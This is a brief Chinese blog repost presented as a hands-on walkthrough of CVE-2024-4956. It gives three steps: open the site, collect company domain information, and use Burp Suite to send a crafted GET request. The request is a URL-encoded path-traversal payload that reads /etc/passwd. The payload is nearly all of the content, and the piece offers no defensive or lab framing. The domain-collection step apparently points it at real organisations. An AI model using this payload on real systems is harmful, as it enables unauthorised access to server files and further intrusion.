CVE-2024-4956实战
一、访问网页
二、公司信息域名收集
三、抓包读取敏感文件
Burpsuite抓包,修改GET请求即可(GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
)
原文地址:https://blog.csdn.net/m0_74402888/article/details/142469932
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!